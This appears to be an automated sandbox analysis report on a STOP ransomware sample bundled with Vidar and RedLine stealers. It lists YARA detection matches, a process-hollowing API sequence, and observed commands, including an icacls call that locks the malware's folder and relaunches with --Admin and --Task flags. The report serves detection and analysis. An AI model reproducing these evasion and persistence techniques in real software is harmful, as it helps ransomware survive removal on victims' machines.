Source: 00000008.00000000.380140535.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000A.00000002.405620904.0000000002340000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.396728940.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000D.00000002.613626255.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.424342597.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.373449176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.425104342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.401628959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.397080958.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000B.00000000.400942313.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000007.00000002.421698327.0000000002162000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000D.00000000.410711943.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.353670554.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000E.00000002.427284724.0000000000696000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.404465575.00000000007FF000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000000F.00000000.425807997.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000002.426411812.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000001.00000000.351845503.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000008.00000000.379133244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2021-05-27
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000009.00000000.389703574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3456, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5360, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5272, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3044, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5076, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 1504, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 5944, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 3788, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: build2.exe PID: 5652, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 4444, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: 2OmglUwx83.exe PID: 4484, type: MEMORYSTR Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0040F4B0 appears 127 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0042F7C0 appears 54 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0044F23E appears 44 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 00428520 appears 51 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 022B8EC0 appears 37 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 004547A0 appears 31 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: String function: 0040E1A0 appears 171 times
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_02290110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 0_2_02290110
Source: 2OmglUwx83.exe Static PE information: Section: .data ZLIB complexity 0.9924791355588737
Source: 2OmglUwx83.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\2OmglUwx83.exe File created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169
Source: classification engine Classification label: mal100.rans.troj.spyw.evad.winEXE@22/447@8/6
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409605 GetComputerNameW,LoadLibraryA,LoadLibraryW,GetProcAddress,InterlockedExchangeAdd,VerifyVersionInfoW,GetTickCount,DebugBreak,GetConsoleAliasExesLengthW,GetPrivateProfileIntA,GetLastError,GetSystemWow64DirectoryW,IsDBCSLeadByte,CreateMailslotA,GetStartupInfoW,InterlockedExchangeAdd,_hwrite,HeapSize,VerifyVersionInfoW,InterlockedIncrement,InterlockedIncrement,AddAtomA,WriteProfileSectionW,GetConsoleAliasesLengthW,GetSystemDefaultLangID,CreateNamedPipeW,AbortSystemShutdownW,ImpersonateNamedPipeClient,LoadLibraryA,GetOverlappedResult,FindNextVolumeW,LeaveCriticalSection,GetModuleHandleW,FormatMessageW,CreateActCtxA,CopyFileW,GetConsoleTitleA,VerifyVersionInfoW,InterlockedIncrement,InterlockedExchangeAdd,InterlockedIncrement,GetCommandLineA,SetLastError,MoveFileWithProgressW,VerifyVersionInfoA, 0_2_00409605
Source: C:\Users\user\Desktop\2OmglUwx83.exe Code function: 0_2_00409909 GetCursorInfo,CharUpperA,GetConsoleAliasesLengthW,GetDefaultCommConfigW,GetProfileSectionA,_puts,GetFileInformationByHandle,_realloc,_realloc,_realloc,_fseek,SetCalendarInfoA,SetCalendarInfoA,SetCurrentDirectoryW,BuildCommDCBAndTimeoutsW,CreateFileW,OpenJobObjectA,WriteConsoleOutputCharacterA,MapUserPhysicalPages,AddAtomA,GetThreadPriority,GetFullPathNameA,FindNextVolumeMountPointW,FillConsoleOutputCharacterA,EnumResourceNamesW,OpenWaitableTimerW,LocalSize,_hwrite,GetPrivateProfileStructA,GetComputerNameW,EnumDateFormatsExA,GetConsoleAliasesW,GetComputerNameW,GetConsoleTitleA,GetSystemWindowsDirectoryW,SetCalendarInfoA,GetFileAttributesA,HeapFree,lstrcpyW,LocalAlloc,GetConsoleFontSize,EnumDateFormatsA,ConvertThreadToFiber,InterlockedCompareExchange,VerifyVersionInfoA,FormatMessageW,SetCommState,FindResourceA,CreateMutexA,MoveFileA,LockFileEx,ResetEvent,FindNextFileW,GetComputerNameExA,CopyFileW,FileTimeToSystemTime,EnumSystemLocalesA,GetComputerNameW,WriteConsoleA,GlobalGetAtomNameW,LoadLibraryA,SetConsoleWindowInfo,GetCPInfoExW,EnumResourceLanguagesA,TerminateThread,GetDiskFreeSpaceExW,GetPrivateProfileStructW,GetConsoleAliasW,lstrcpyA,GetOEMCP,ExitThread, 0_2_00409909
Source: 2OmglUwx83.exe Virustotal: Detection: 54%
Source: 2OmglUwx83.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\2OmglUwx83.exe File read: C:\Users\user\Desktop\2OmglUwx83.exe
Source: C:\Users\user\Desktop\2OmglUwx83.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe"
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: unknown Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
Source: C:\Users\user\Desktop\2OmglUwx83.exe Process created: C:\Users\user\Desktop\2OmglUwx83.exe "C:\Users\user\Desktop\2OmglUwx83.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe Process created: C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe C:\Users\user\AppData\Local\dc8ee5c2-8cfe-4224-95e9-01d5d6a62169\2OmglUwx83.exe --Task
